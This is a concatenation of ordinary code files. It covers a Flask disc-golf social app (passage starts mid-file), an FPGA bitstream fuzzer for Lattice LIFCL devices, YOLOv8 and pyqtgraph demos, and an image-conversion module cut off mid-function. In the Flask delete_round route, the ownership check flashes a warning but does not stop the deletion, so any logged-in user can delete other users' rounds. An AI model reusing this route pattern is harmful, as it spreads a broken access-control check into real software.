followed_user.followers.append(g.user)\n db.session.commit()\n\n return redirect(f\"/users/{id}\")\n\n\n@app.route(\"/users/<int:id>/unfollow\", methods=['POST'])\ndef unfollow_user(id):\n \"\"\"removes user from followed users\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n if g.user.id == id:\n flash(\"Can't unfollow yourself, unfortunately\", \"warning\")\n return redirect('/')\n\n followed_user = User.query.get_or_404(id)\n followed_user.followers.remove(g.user)\n db.session.commit()\n\n return redirect(f\"/users/{id}\")\n\n\n@app.route(\"/round_info/<int:id>\")\ndef show_round_info(id):\n \"\"\"Shows details from a specified round\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n d_round = UserRound.query.get_or_404(id)\n return render_template('round_info.html', round=d_round)\n\n\n###################################\n# Search Routes #\n\n@app.route('/course_search_name')\ndef search_course_by_name_results():\n \"\"\"Shows results of a search for courses by name.\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n\n search = request.args['course-name-input']\n courses = get_course_by_name(search)\n return render_template('/search/course_search_results.html', courses=courses)\n\n\n@app.route('/fav_course_search_name/<fav>')\ndef search_fav_course_by_name_results(fav):\n \"\"\"Shows results of a search for courses from a fav link\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n\n courses = get_course_by_name(fav)\n return 
render_template('/search/course_search_results.html', courses=courses)\n\n\n@app.route('/course_search_zip')\ndef search_course_by_zip_results():\n \"\"\"Shows results of a search for courses by zipcode.\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n\n search = request.args['course-zip']\n courses = search_by_zip(search)\n return render_template('/search/course_search_results.html', courses=courses)\n\n\n@app.route('/user_search')\ndef user_search_results():\n \"\"\"Shows results of a search for users by username.\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n\n search = request.args['user-username-input']\n users = User.query.filter(User.username.like(f\"%{search}%\")).all()\n return render_template('/search/user_search_results.html', users=users)\n\n\n########################################################################\n# API calls from the front end #\n\n@app.route('/delete_round/<int:id>', methods=['DELETE'])\ndef delete_round(id):\n \"\"\"Deletes and removes round\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n dround = UserRound.query.get_or_404(id)\n if dround.user_id != g.user.id:\n flash(\"Cannot delete other users' rounds\", \"danger\")\n db.session.delete(dround)\n db.session.commit()\n return jsonify()\n","repo_name":"namroc89/DiscDown","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
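The route decorators in this record rely on Flask URL converters such as `<int:id>`; given that every handler takes an `id` used with `query.get_or_404(id)`, `<int:id>` is the natural reading, though a plain `<id>` (string) converter would also match. A minimal standalone sketch of the converter pattern:

```python
from flask import Flask

app = Flask(__name__)


@app.route('/users/<int:id>/rounds')
def show_user_rounds(id):
    # <int:id> converts the matching path segment to an int
    # before the view function is called.
    return f"rounds for user {id}"


# GET /users/42/rounds  ->  "rounds for user 42"
```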
+{"seq_id":"36568374229","text":"from fuzzconfig import FuzzConfig\nimport nonrouting\nimport fuzzloops\nimport re\n\nconfigs = [\n\n # LIFCL-40 tiles\n (\"IOL_B8A\", \"IOLOGICA\", FuzzConfig(job=\"IOL5AMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C8:SYSIO_B5_0\", \"CIB_R56C9:SYSIO_B5_1\"])),\n (\"IOL_B8B\", \"IOLOGICB\", FuzzConfig(job=\"IOL5BMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C8:SYSIO_B5_0\", \"CIB_R56C9:SYSIO_B5_1\"])),\n (\"IOL_B18A\", \"IOLOGICA\", FuzzConfig(job=\"IOL4AMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C18:SYSIO_B4_0\", \"CIB_R56C19:SYSIO_B4_1\"])),\n (\"IOL_B18B\", \"IOLOGICB\", FuzzConfig(job=\"IOL4BMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C18:SYSIO_B4_0\", \"CIB_R56C19:SYSIO_B4_1\"])),\n (\"IOL_B56A\", \"IOLOGICA\", FuzzConfig(job=\"IOL3AMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C56:SYSIO_B3_0\", \"CIB_R56C57:SYSIO_B3_1\"])),\n (\"IOL_B56B\", \"IOLOGICB\", FuzzConfig(job=\"IOL3BMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C56:SYSIO_B3_0\", \"CIB_R56C57:SYSIO_B3_1\"])),\n\n (\"IOL_R32A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL2AEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R32C87:SYSIO_B2_0_EVEN\"])),\n (\"IOL_R32B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL2BEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R32C87:SYSIO_B2_0_EVEN\"])),\n (\"IOL_L32A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL6AEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R32C0:SYSIO_B6_0_EVEN\"])),\n (\"IOL_L32B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL6BEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R32C0:SYSIO_B6_0_EVEN\"])),\n (\"IOL_R13A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL1AEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R13C87:SYSIO_B1_0_EVEN\"])),\n (\"IOL_R13B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL1BEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R13C87:SYSIO_B1_0_EVEN\"])),\n (\"IOL_L6A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL7AEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R6C0:SYSIO_B7_0_EVEN\"])),\n (\"IOL_L6B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL7BEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R6C0:SYSIO_B7_0_EVEN\"])),\n\n (\"IOL_R34A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL2AOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R34C87:SYSIO_B2_0_ODD\"])),\n (\"IOL_R34B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL2BOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R34C87:SYSIO_B2_0_ODD\"])),\n (\"IOL_L34A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL6AOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R34C0:SYSIO_B6_0_ODD\"])),\n (\"IOL_L34B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL6BOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R34C0:SYSIO_B6_0_ODD\"])),\n (\"IOL_R15A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL1AOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R15C87:SYSIO_B1_0_ODD\"])),\n (\"IOL_R15B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL1BOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R15C87:SYSIO_B1_0_ODD\"])),\n (\"IOL_L8A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL7AOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R8C0:SYSIO_B7_0_ODD\"])),\n (\"IOL_L8B\", \"SIOLOGICB\", 
FuzzConfig(job=\"IOL7BOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R8C0:SYSIO_B7_0_ODD\"])),\n\n (\"IOL_T76A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL0AOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R0C76:SYSIO_B0_0_ODD\"])),\n (\"IOL_T76B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL0BOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R0C76:SYSIO_B0_0_ODD\"])),\n\n (\"IOL_T78A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL0AEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R0C78:SYSIO_B0_0_EVEN\"])),\n (\"IOL_T78B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL0BEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R0C78:SYSIO_B0_0_EVEN\"])),\n\n (\"IOL_R46A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL2CMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R46C87:SYSIO_B2_0_C\", \"CIB_R47C87:SYSIO_B2_0_REM\"])),\n (\"IOL_R46B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL2DMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R46C87:SYSIO_B2_0_C\", \"CIB_R47C87:SYSIO_B2_0_REM\"])),\n (\"IOL_L46A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL6CMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R46C0:SYSIO_B6_0_C\", \"CIB_R47C0:SYSIO_B6_0_REM\"])),\n (\"IOL_L46B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL6DMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R46C0:SYSIO_B6_0_C\", \"CIB_R47C0:SYSIO_B6_0_REM\"])),\n (\"IOL_R10A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL1CMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R10C87:SYSIO_B1_0_C\", \"CIB_R11C87:SYSIO_B1_0_REM\"])),\n (\"IOL_R10B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL1DMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R10C87:SYSIO_B1_0_C\", \"CIB_R11C87:SYSIO_B1_0_REM\"])),\n (\"IOL_L10A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL7CMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R10C0:SYSIO_B7_0_C\", \"CIB_R11C0:SYSIO_B7_0_REM\"])),\n (\"IOL_L10B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL7DMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R10C0:SYSIO_B7_0_C\", \"CIB_R11C0:SYSIO_B7_0_REM\"])),\n\n (\"IOL_R3B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL3DEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R3C87:SYSIO_B1_DED\"])),\n\n # LIFCL-17 tiles\n (\"IOL_T57A\", \"SIOLOGICA\", FuzzConfig(job=\"IOLT57AMODE\", device=\"LIFCL-17\", sv=\"../shared/empty_17.v\", tiles=[\"CIB_R0C57:SYSIO_B0_0_15K\"])),\n (\"IOL_T57B\", \"SIOLOGICB\", FuzzConfig(job=\"IOLT57BMODE\", device=\"LIFCL-17\", sv=\"../shared/empty_17.v\", tiles=[\"CIB_R0C57:SYSIO_B0_0_15K\"])),\n\n (\"IOL_R3B\", \"SIOLOGICB\", FuzzConfig(job=\"IOLR3BMODE\", device=\"LIFCL-17\", sv=\"../shared/empty_17.v\", tiles=[\"CIB_R3C75:SYSIO_B1_DED_15K\", \"CIB_R4C75:PIC_B1_DED_15K\"])),\n\n (\"IOL_R5A\", \"SIOLOGICA\", FuzzConfig(job=\"IOLR5AMODE\", device=\"LIFCL-17\", sv=\"../shared/empty_17.v\", tiles=[\"CIB_R5C75:SYSIO_B1_0_15K\"])),\n (\"IOL_R5B\", \"SIOLOGICB\", FuzzConfig(job=\"IOLR5BMODE\", device=\"LIFCL-17\", sv=\"../shared/empty_17.v\", tiles=[\"CIB_R5C75:SYSIO_B1_0_15K\"])),\n\n # It appears that LIFCL-17 does not expose any pins from\n # - SYSIO_B1_1_15K\n]\n\ndef main():\n def per_config(x):\n site, prim, cfg = x\n cfg.setup()\n empty = cfg.build_design(cfg.sv, {})\n\n if cfg.device == \"LIFCL-40\":\n cfg.sv = \"iologic_40.v\"\n elif cfg.device == \"LIFCL-17\":\n cfg.sv = \"iologic_17.v\"\n else:\n assert False, cfg.device\n\n s = (prim[0] == \"S\")\n\n side 
= site[4]\n pos = int(site[5:-1])\n ab = site[-1]\n\n if cfg.device == \"LIFCL-40\":\n if side == \"L\":\n rc = \"R{}C{}\".format(pos, 0)\n elif side == \"R\":\n rc = \"R{}C{}\".format(pos, 87)\n elif side == \"B\":\n rc = \"R{}C{}\".format(56, pos)\n elif side == \"T\":\n rc = \"R{}C{}\".format(0, pos)\n elif cfg.device == \"LIFCL-17\":\n if side == \"L\":\n rc = \"R{}C{}\".format(pos, 0)\n elif side == \"R\":\n rc = \"R{}C{}\".format(pos, 75)\n elif side == \"B\":\n rc = \"R{}C{}\".format(29, pos)\n elif side == \"T\":\n rc = \"R{}C{}\".format(0, pos)\n else:\n assert False, cfg.device\n\n def get_substs(mode=\"NONE\", default_cfg=False, scope=None, kv=None, mux=False, glb=False, dqs=False, pinconn=\"\"):\n if default_cfg:\n config = \"SCLKINMUX:#OFF GSR:ENABLED INMUX:#OFF OUTMUX:#OFF DELAYMUX:#OFF SRMODE:#ASYNC LOAD_NMUX:#OFF DIRMUX:#OFF MOVEMUX:#OFF CEOUTMUX:#OFF CEINMUX:#OFF LSRINMUX:#OFF LSROUTMUX:#OFF STOP_EN:DISABLED\"\n elif kv is None:\n config = \"\"\n elif glb:\n config=\"{}:{}\".format(kv[0], kv[1])\n elif dqs and \"_\" in kv[1]:\n val, dqsmode = kv[1].split(\"_\")\n config = \"{}:::{}={} WRCLKMUX:{}\".format(mode if scope is None else scope, kv[0], val, dqsmode)\n elif mux:\n signame = kv[0].replace(\"MUX\", \"\")\n val = \"{}:::{}=#SIG\".format(signame, signame)\n if kv[1] in (\"0\", \"1\"):\n val = \"CONST:::CONST={}\".format(kv[1])\n if kv[1] == \"INV\":\n val = \"{}:::{}=#INV\".format(signame, signame)\n config = \"{}:{}\".format(kv[0], val)\n else:\n config = \"{}:::{}={}\".format(mode if scope is None else scope, kv[0], kv[1])\n if pinconn != \"\":\n # Add routing so that pin is 'used'\n if \"TOUT\" in pinconn:\n if side in (\"L\", \"R\", \"T\"):\n first_wire = \"{}_JTOUT_SIOLOGIC_CORE_IBASE_PIC_{}\".format(rc, ab)\n second_wire = \"{}_JPADDT_SEIO33_CORE_IO{}\".format(rc, ab)\n else:\n first_wire = \"{}_JTOUT_IOLOGIC_CORE_I_GEARING_PIC_TOP_{}\".format(rc, ab)\n if ab == \"A\":\n second_wire = \"{}_JPADDT_DIFFIO18_CORE_IO{}\".format(rc, ab)\n else:\n second_wire = \"{}_JPADDT_SEIO18_CORE_IO{}\".format(rc, ab)\n else:\n if side in (\"L\", \"R\", \"T\"):\n first_wire = \"{}_JDOUT_SIOLOGIC_CORE_IBASE_PIC_{}\".format(rc, ab)\n second_wire = \"{}_JPADDO_SEIO33_CORE_IO{}\".format(rc, ab)\n else:\n first_wire = \"{}_JDOUT_IOLOGIC_CORE_I_GEARING_PIC_TOP_{}\".format(rc, ab)\n if ab == \"A\":\n second_wire = \"{}_JPADDO_DIFFIO18_CORE_IO{}\".format(rc, ab)\n else:\n second_wire = \"{}_JPADDO_SEIO18_CORE_IO{}\".format(rc, ab)\n route = '(* \\\\xref:LOG =\"q_c@0@9\", \\\\dm:arcs =\"{}.{}\" *) '.format(second_wire, first_wire)\n sig = route + \"wire sig;\"\n else:\n sig = \"\"\n return dict(mode=mode, cmt=\"//\" if mode == \"NONE\" else \"\", config=config, site=site, s=\"S\" if s else \"\", pinconn=pinconn, sig=sig)\n modes = [\"NONE\", \"IREG_OREG\", \"IDDRX1_ODDRX1\"]\n if not s:\n modes += [\"IDDRXN\", \"ODDRXN\", \"MIDDRXN_MODDRXN\"]\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.MODE\".format(prim), modes,\n lambda x: get_substs(x, default_cfg=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.GSR\".format(prim), [\"ENABLED\", \"DISABLED\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"GSR\", x), glb=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.SRMODE\".format(prim), [\"ASYNC\", \"LSR_OVER_CE\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"SRMODE\", x), glb=True), False)\n if not s:\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IDDRXN.DDRMODE\".format(prim), [\"NONE\", \"IDDRX2\", \"IDDR71\", \"IDDRX4\", \"IDDRX5\"],\n lambda x: 
get_substs(mode=\"IDDRXN\", kv=(\"DDRMODE\", \"#OFF\" if x == \"NONE\" else x)), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.ODDRXN.DDRMODE\".format(prim), [\"NONE\", \"ODDRX2\", \"ODDR71\", \"ODDRX4\", \"ODDRX5\"],\n lambda x: get_substs(mode=\"ODDRXN\", kv=(\"DDRMODE\", \"#OFF\" if x == \"NONE\" else x)), False)\n\n for sig in (\"SCLKIN\", \"SCLKOUT\", \"CEIN\", \"CEOUT\", \"LSRIN\", \"LSROUT\"):\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.{}MUX\".format(prim, sig), [\"1\" if sig[0:2] == \"CE\" else \"0\", sig, \"INV\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"{}MUX\".format(sig), x), mux=True), False)\n\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IDDRX1_ODDRX1.OUTPUT\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IDDRX1_ODDRX1\", default_cfg=True, pinconn=(\".DOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IREG_OREG.OUTPUT\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IREG_OREG\", default_cfg=True, pinconn=(\".DOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n\n if not s:\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IDDRX1_ODDRX1.TRISTATE\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IDDRX1_ODDRX1\", kv=(\"TOUTMUX\", \"TSREG\"), glb=True, pinconn=(\".TOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IREG_OREG.TRISTATE\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"TOUTMUX\", \"TSREG\"), glb=True, pinconn=(\".TOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n else:\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IDDRX1_ODDRX1.TRISTATE\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IDDRX1_ODDRX1\", default_cfg=True, pinconn=(\".TOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IREG_OREG.TRISTATE\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IREG_OREG\", default_cfg=True, pinconn=(\".TOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.INMUX\".format(prim), [\"BYPASS\", \"DELAY\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"INMUX\", x), glb=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.OUTMUX\".format(prim), [\"BYPASS\", \"DELAY\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"OUTMUX\", x), glb=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.DELAYMUX\".format(prim), [\"OUT_REG\", \"IN\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"DELAYMUX\", x), glb=True), False)\n\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.MOVEMUX\".format(prim), [\"0\", \"MOVE\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"MOVEMUX\", x), glb=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.DIRMUX\".format(prim), [\"0\", \"DIR\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"DIRMUX\", x), glb=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.LOAD_NMUX\".format(prim), [\"1\", \"LOAD_N\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"LOAD_NMUX\", x), glb=True), False)\n\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.INREG.REGSET\".format(prim), [\"SET\", \"RESET\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"REGSET\", x), scope=\"INREG\"), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.OUTREG.REGSET\".format(prim), 
[\"SET\", \"RESET\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"REGSET\", x), scope=\"OUTREG\"), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.TSREG.REGSET\".format(prim), [\"SET\", \"RESET\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"REGSET\", x), scope=\"TSREG\"), False)\n if not s:\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.MIDDRXN.DDRMODE\".format(prim), [\"NONE\", \"MIDDRX2\", \"MIDDRX4\"],\n lambda x: get_substs(mode=\"MIDDRXN_MODDRXN\", kv=(\"DDRMODE\", \"#OFF\" if x == \"NONE\" else x), scope=\"MIDDRXN\"), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.MODDRXN.DDRMODE\".format(prim), [\"NONE\", \"MOSHX2\", \"MOSHX4\", \"MODDRX2_DQSW\", \"MODDRX4_DQSW\", \"MODDRX2_DQSW270\", \"MODDRX4_DQSW270\"],\n lambda x: get_substs(mode=\"MIDDRXN_MODDRXN\", kv=(\"DDRMODE\", \"#OFF\" if x == \"NONE\" else x), scope=\"MODDRXN\", dqs=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.MTDDRXN.DDRMODE\".format(prim), [\"NONE\", \"MTSHX2\", \"MTSHX4\"],\n lambda x: get_substs(mode=\"MIDDRXN_MODDRXN\", kv=(\"DDRMODE\", \"#OFF\" if x == \"NONE\" else x + \" TOUTMUX:MTDDR\"), scope=\"MTDDRXN\"), False)\n fuzzloops.parallel_foreach(configs, per_config)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gatecat/prjoxide","sub_path":"fuzzers/LIFCL/070-iologic_mode/fuzzer.py","file_name":"fuzzer.py","file_ext":"py","file_size_in_byte":16036,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"18"}
+{"seq_id":"72326089639","text":"# 引入cv2用于视频处理\nimport cv2\n# 引入YOLO模型用于目标检测\nfrom ultralytics import YOLO\n\n# 加载YOLO模型,进行目标检测\nmodel = YOLO('../weights/yolov8n-seg.pt')\n\n# 打开视频文件,这里的路径需要自行替换\nvideo_path = \"../assets/people_walking_1.mp4\"\ncap = cv2.VideoCapture(video_path)\n\n# 循环读取视频帧\nwhile cap.isOpened():\n # 读取一帧图像\n success, frame = cap.read()\n\n if not success:\n print(\"没有内容,退出啦 :) \")\n break\n\n if success:\n # 对读取的帧进行目标检测\n results = model(frame)\n\n # 可视化检测结果,这里设置置信度阈值为0.5,不显示框,显示掩码和概率\n annotated_frame = results[0].plot(conf=0.5, boxes=False, masks=True, probs=True)\n\n # 显示标注后的帧\n cv2.imshow(\"YOLOv8 Inference\", annotated_frame)\n\n # 如果按下“q”键,跳出循环\n # if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n # break\n if cv2.waitKey(24) == ord('q'): # 改为24ms,如果是1ms,则播放速度过快。\n break\n\n else:\n # 如果视频结束,跳出循环\n break\n\n# 释放视频捕捉对象,并关闭所有窗口\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"LiuEhe/YOLO_detect","sub_path":"demo/yolov8_smaple.py","file_name":"yolov8_smaple.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"14073227617","text":"from PyQt5 import QtWidgets, QtCore\nfrom pyqtgraph import PlotWidget, plot\nimport pyqtgraph as pg\nimport sys # We need sys so that we can pass argv to QApplication\nimport os\nfrom random import randint\n\nclass MainWindow(QtWidgets.QMainWindow):\n\n def __init__(self, *args, **kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n self.init_status_figure()\n self.update_status_figure()\n \n def init_status_figure(self):\n\n \n self.graphWidget = pg.PlotWidget()\n self.setCentralWidget(self.graphWidget)\n\n self.status_x = list(range(100)) # 100 time points\n self.status_y = [randint(0,100) for _ in range(100)] # 100 data points\n\n self.graphWidget.setBackground('w')\n\n pen = pg.mkPen(color=(255, 0, 0))\n self.data_line = self.graphWidget.plot(self.status_x, self.status_y, pen=pen)\n #\n # def status_fig_window(self):\n # trendGroupBox = QGroupBox(\"\") \n # childWindow.setObjectName(\"\")\n # childWindow.setWindowTitle(\"Online data monitoring for ADC channel %s\" % str(subindex))\n # childWindow.resize(600, 300) # w*h\n # logframe = QFrame()\n # logframe.setLineWidth(0.6)\n # childWindow.setCentralWidget(logframe)\n # self.trendLayout = QGridLayout()\n # Fig = self.graphWidget\n # self.trendLayout.addWidget(Fig, 0, 0)\n # trendGroupBox.setLayout(self.trendLayout)\n # logframe.setLayout(self.trendLayout) \n \n def update_status_figure(self): \n self.timer = QtCore.QTimer()\n self.timer.setInterval(50)\n self.timer.timeout.connect(self.update_communication_status)\n self.timer.start()\n \n def update_communication_status(self):\n\n self.status_x = self.status_x[1:] # Remove the first y element.\n self.status_x.append(self.status_x[-1] + 1) # Add a new value 1 higher than the last.\n\n self.status_y = self.status_y[1:] # Remove the first\n self.status_y.append( randint(0,100)) # Add a new random value.\n\n self.data_line.setData(self.status_x, self.status_y) # Update the data.\n \napp = QtWidgets.QApplication(sys.argv)\nw = MainWindow()\nw.show()\nsys.exit(app.exec_())","repo_name":"ahmedqamesh/mopshub-sw-kcu102","sub_path":"test_files/pygraph.py","file_name":"pygraph.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"22468099476","text":"import argparse\nfrom collections import defaultdict\nfrom enum import Enum\nimport os\nfrom typing import cast, Dict, Optional, Sequence, Tuple\nfrom typing_extensions import Buffer\n\nimport numpy as np\nimport PIL\n\nfrom calliope.models import ImageFormat\nfrom calliope.tables import Image\nfrom calliope.utils.file import get_file_extension\n\n\ndef guess_image_format_from_filename(filename: str) -> ImageFormat:\n extension = get_file_extension(filename)\n if extension in (\"raw\", \"rgb565\"):\n return ImageFormat.RGB565\n if extension in (\"grayscale16\"):\n return ImageFormat.GRAYSCALE16\n elif extension in (\"jpg\", \"jpeg\"):\n return ImageFormat.JPEG\n elif extension == \"png\":\n return ImageFormat.PNG\n else:\n raise ValueError(f\"Unrecognized image format for {filename}\")\n\n\ndef image_format_to_media_type(image_format: ImageFormat) -> str:\n return image_format.value\n\n\n# For a good discussion of the RGB565 format,\n# see: http://www.barth-dev.de/online/rgb565-color-picker/#\n\n# The below conversion code was inspired by https://github.com/CommanderRedYT\n\n\ndef convert_png_to_rgb565(input_filename: str, output_filename: str) -> Image:\n \"\"\"\n Converts the given PNG file to RGB565/raw format.\n \"\"\"\n png = PIL.Image.open(input_filename)\n\n input_image_content = png.getdata()\n output_image_content = np.empty(len(input_image_content), np.uint16)\n for i, pixel in enumerate(input_image_content):\n r = (pixel[0] >> 3) & 0x1F\n g = (pixel[1] >> 2) & 0x3F\n b = (pixel[2] >> 3) & 0x1F\n rgb = r << 11 | g << 5 | b\n output_image_content[i] = rgb\n\n with open(output_filename, \"wb\") as output_file:\n output_file.write(cast(Buffer, output_image_content))\n\n return Image(\n width=png.width,\n height=png.height,\n format=ImageFormat.RGB565.value,\n url=output_filename,\n )\n\n\ndef convert_rgb565_to_png(\n input_filename: str, output_filename: str, width: int, height: int\n) -> Image:\n \"\"\"\n Converts the given RGB565/raw file to PNG format.\n 